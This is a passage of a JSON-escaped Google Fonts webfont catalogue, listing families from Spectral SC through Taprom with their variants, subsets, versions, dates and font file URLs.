\"http://fonts.gstatic.com/s/spectralsc/v11/Ktk2ALCRZonmalTgyPmRfsWg29jSN4O3WYZB_sU.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/spectralsc/v11/Ktk0ALCRZonmalTgyPmRfs0CxUTXPYeVXJZB.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/spectralsc/v11/Ktk2ALCRZonmalTgyPmRfsWg28TRN4O3WYZB_sU.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Spicy Rice\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/spicyrice/v21/uK_24rSEd-Uqwk4jY1RyGv-2WkowRcc.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Spinnaker\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-04-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/spinnaker/v17/w8gYH2oyX-I0_rvR6Hmn3HwLqOqSBg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Spirax\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/spirax/v21/buE3poKgYNLy0F3cXktt-Csn-Q.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Splash\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/splash/v1/KtksAL2RZoDkbU6hpPPGNdS6wg.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Spline Sans\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v8\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/splinesans/v8/_6_sED73Uf-2WfU2LzycEZousNzn1a1lKWRpZlnYEtvlUfE2kw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/splinesans/v8/_6_sED73Uf-2WfU2LzycEZousNzn1a1lKWRpOFnYEtvlUfE2kw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/splinesans/v8/_6_sED73Uf-2WfU2LzycEZousNzn1a1lKWRpClnYEtvlUfE2kw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/splinesans/v8/_6_sED73Uf-2WfU2LzycEZousNzn1a1lKWRp5l7YEtvlUfE2kw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/splinesans/v8/_6_sED73Uf-2WfU2LzycEZousNzn1a1lKWRp317YEtvlUfE2kw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Spline Sans Mono\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v4\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/splinesansmono/v4/R70MjzAei_CDNLfgZxrW6wrZOF2WdZ6xabUGSVtNuGA8MrtVy4d4dGb1.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/splinesansmono/v4/R70MjzAei_CDNLfgZxrW6wrZOF2WdZ6xabUGSVtNuGBiMrtVy4d4dGb1.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/splinesansmono/v4/R70MjzAei_CDNLfgZxrW6wrZOF2WdZ6xabUGSVtNuGBQMrtVy4d4dGb1.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/splinesansmono/v4/R70MjzAei_CDNLfgZxrW6wrZOF2WdZ6xabUGSVtNuGC8NbtVy4d4dGb1.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/splinesansmono/v4/R70MjzAei_CDNLfgZxrW6wrZOF2WdZ6xabUGSVtNuGCFNbtVy4d4dGb1.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/splinesansmono/v4/R70yjzAei_CDNLfgZxrW6wrZOF2WX5eDlm1vIsHjv3WqcQ0WwYNacXb12MM.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/splinesansmono/v4/R70yjzAei_CDNLfgZxrW6wrZOF2WX5eDlm1vIsHjv3WqcVMWwYNacXb12MM.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/splinesansmono/v4/R70yjzAei_CDNLfgZxrW6wrZOF2WX5eDlm1vIsHjv3WqcWEWwYNacXb12MM.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/splinesansmono/v4/R70yjzAei_CDNLfgZxrW6wrZOF2WX5eDlm1vIsHjv3WqcY0RwYNacXb12MM.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/splinesansmono/v4/R70yjzAei_CDNLfgZxrW6wrZOF2WX5eDlm1vIsHjv3WqcbQRwYNacXb12MM.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Squada One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/squadaone/v14/BCasqZ8XsOrx4mcOk6MtWaA8WDBkHgs.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Square Peg\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/squarepeg/v2/y83eW48Nzw6ZlUHc-phrBDHrHHfrFPE.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sree Krushnadevaraya\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"telugu\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sreekrushnadevaraya/v21/R70FjzQeifmPepmyQQjQ9kvwMkWYPfTA_EWb2FhQuXir.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sriracha\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thai\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sriracha/v10/0nkrC9D4IuYBgWcI9ObYRQDioeb0.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Srisakdi\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thai\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/srisakdi/v16/yMJRMIlvdpDbkB0A-jq8fSx5i814.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/srisakdi/v16/yMJWMIlvdpDbkB0A-gIAUghxoNFxW0Hz.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Staatliches\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/staatliches/v11/HI_OiY8KO6hCsQSoAPmtMbectJG9O9PS.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Stalemate\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/stalemate/v20/taiIGmZ_EJq97-UfkZRpuqSs8ZQpaQ.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Stalinist One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v54\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/stalinistone/v54/MQpS-WezM9W4Dd7D3B7I-UT7eZ-UPyacPbo.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Stardos Stencil\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/stardosstencil/v15/X7n94bcuGPC8hrvEOHXOgaKCc2TR71R3tiSx0g.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/stardosstencil/v15/X7n44bcuGPC8hrvEOHXOgaKCc2TpU3tTvg-t29HSHw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Stick\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/stick/v15/Qw3TZQpMCyTtJSvfvPVDMPoF.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Stick No Bills\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"sinhala\"\n      ],\n      \"version\": \"v8\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/sticknobills/v8/bWts7ffXZwHuAa9Uld-oEK4QKlxj9f9t_7uEmjcVP8Q7KriwKhcTKA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/sticknobills/v8/bWts7ffXZwHuAa9Uld-oEK4QKlxj9f9t_7uEmjcV4cQ7KriwKhcTKA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/sticknobills/v8/bWts7ffXZwHuAa9Uld-oEK4QKlxj9f9t_7uEmjcVv8Q7KriwKhcTKA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/sticknobills/v8/bWts7ffXZwHuAa9Uld-oEK4QKlxj9f9t_7uEmjcVjcQ7KriwKhcTKA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/sticknobills/v8/bWts7ffXZwHuAa9Uld-oEK4QKlxj9f9t_7uEmjcVYcM7KriwKhcTKA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/sticknobills/v8/bWts7ffXZwHuAa9Uld-oEK4QKlxj9f9t_7uEmjcVWMM7KriwKhcTKA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/sticknobills/v8/bWts7ffXZwHuAa9Uld-oEK4QKlxj9f9t_7uEmjcVP8M7KriwKhcTKA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Stint Ultra Condensed\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/stintultracondensed/v21/-W_gXIrsVjjeyEnPC45qD2NoFPtBE0xCh2A-qhUO2cNvdg.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Stint Ultra Expanded\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/stintultraexpanded/v20/CSRg4yNNh-GbW3o3JkwoDcdvMKMf0oBAd0qoATQkWwam.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Stoke\",\n      \"variants\": [\n        \"300\",\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/stoke/v22/z7NXdRb7aTMfKNvFVgxC_pjcTeWU.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/stoke/v22/z7NadRb7aTMfKONpfihK1YTV.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Strait\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/strait/v13/DtViJxy6WaEr1LZzeDhtkl0U7w.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Style Script\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/stylescript/v7/vm8xdRX3SV7Z0aPa88xzW5npeFT76NZnMw.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Stylish\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/stylish/v20/m8JSjfhPYriQkk7-fo35dLxEdmo.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sue Ellen Francisco\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sueellenfrancisco/v16/wXK3E20CsoJ9j1DDkjHcQ5ZL8xRaxru9ropF2lqk9H4.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Suez One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/suezone/v11/taiJGmd_EZ6rqscQgNFJkIqg-I0w.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sulphur Point\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/sulphurpoint/v14/RLpkK5vv8KaycDcazWFPBj2afVU6n6kFUHPIFaU.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/sulphurpoint/v14/RLp5K5vv8KaycDcazWFPBj2aRfkSu6EuTHo.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/sulphurpoint/v14/RLpkK5vv8KaycDcazWFPBj2afUU9n6kFUHPIFaU.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sumana\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sumana/v10/4UaDrE5TqRBjGj-G8Bji76zR4w.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/sumana/v10/4UaArE5TqRBjGj--TDfG54fN6ppsKg.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sunflower\",\n      \"variants\": [\n        \"300\",\n        \"500\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/sunflower/v14/RWmPoKeF8fUjqIj7Vc-06MfiqYsGBGBzCw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/sunflower/v14/RWmPoKeF8fUjqIj7Vc-0sMbiqYsGBGBzCw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/sunflower/v14/RWmPoKeF8fUjqIj7Vc-0-MDiqYsGBGBzCw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sunshiney\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sunshiney/v24/LDIwapGTLBwsS-wT4vcgE8moUePWkg.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Supermercado One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/supermercadoone/v22/OpNXnpQWg8jc_xps_Gi14kVVEXOn60b3MClBRTs.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sura\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sura/v15/SZc23FL5PbyzFf5UWzXtjUM.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/sura/v15/SZc53FL5PbyzLUJ7fz3GkUrS8DI.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Suranna\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"telugu\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-04-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/suranna/v13/gokuH6ztGkFjWe58tBRZT2KmgP0.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Suravaram\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"telugu\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/suravaram/v21/_gP61R_usiY7SCym4xIAi261Qv9roQ.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Suwannaphum\",\n      \"variants\": [\n        \"100\",\n        \"300\",\n        \"regular\",\n        \"700\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"khmer\",\n        \"latin\"\n      ],\n      \"version\": \"v29\",\n      \"lastModified\": \"2022-04-27\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/suwannaphum/v29/jAnAgHV7GtDvc8jbe8hXXL3B9cSWXx2VZmk.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/suwannaphum/v29/jAnfgHV7GtDvc8jbe8hXXL0J1-S8cRGcf3Ai.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/suwannaphum/v29/jAnCgHV7GtDvc8jbe8hXXIWl_8C0Wg2V.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/suwannaphum/v29/jAnfgHV7GtDvc8jbe8hXXL0Z0OS8cRGcf3Ai.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/suwannaphum/v29/jAnfgHV7GtDvc8jbe8hXXL0h0uS8cRGcf3Ai.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Swanky and Moo Moo\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/swankyandmoomoo/v22/flUlRrKz24IuWVI_WJYTYcqbEsMUZ3kUtbPkR64SYQ.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Syncopate\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/syncopate/v19/pe0sMIuPIYBCpEV5eFdyAv2-C99ycg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/syncopate/v19/pe0pMIuPIYBCpEV5eFdKvtKaA_Rue1UwVg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Syne\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"greek\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/syne/v15/8vIS7w4qzmVxsWxjBZRjr0FKM_04uT6kR47NCV5Z.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/syne/v15/8vIS7w4qzmVxsWxjBZRjr0FKM_0KuT6kR47NCV5Z.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/syne/v15/8vIS7w4qzmVxsWxjBZRjr0FKM_3mvj6kR47NCV5Z.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/syne/v15/8vIS7w4qzmVxsWxjBZRjr0FKM_3fvj6kR47NCV5Z.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/syne/v15/8vIS7w4qzmVxsWxjBZRjr0FKM_24vj6kR47NCV5Z.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Syne Mono\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/synemono/v15/K2FzfZNHj_FHBmRbFvHzIqCkDyvqZA.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Syne Tactile\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/synetactile/v15/11hGGpna2UTQKjMCVzjAPMKh3ysdjvKU8Q.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Tai Heritage Pro\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"tai-viet\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/taiheritagepro/v2/sZlfdQid-zgaNiNIYcUzJMU3IYyNoHxSENxuLuE.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/taiheritagepro/v2/sZlYdQid-zgaNiNIYcUzJMU3IYyNmMB9NNRFMuhjCXY.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Tajawal\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/tajawal/v9/Iurf6YBj_oCad4k1l_6gLrZjiLlJ-G0.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/tajawal/v9/Iurf6YBj_oCad4k1l5qjLrZjiLlJ-G0.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/tajawal/v9/Iura6YBj_oCad4k1rzaLCr5IlLA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/tajawal/v9/Iurf6YBj_oCad4k1l8KiLrZjiLlJ-G0.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/tajawal/v9/Iurf6YBj_oCad4k1l4qkLrZjiLlJ-G0.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/tajawal/v9/Iurf6YBj_oCad4k1l5anLrZjiLlJ-G0.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/tajawal/v9/Iurf6YBj_oCad4k1l7KmLrZjiLlJ-G0.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Tangerine\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/tangerine/v17/IurY6Y5j_oScZZow4VOBDpxNhLBQ4Q.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/tangerine/v17/Iurd6Y5j_oScZZow4VO5srNpjJtM6G0t9w.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Tapestry\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/tapestry/v2/SlGTmQecrosEYXhaGBIkqnB6aSQU.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Taprom\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"khmer\",\n        \"latin\"\n      ],\n      \"version\": \"v27\",\n      \"lastModified\": \"2022-04-27\",\n      \"files\": {\n        \"regular\": 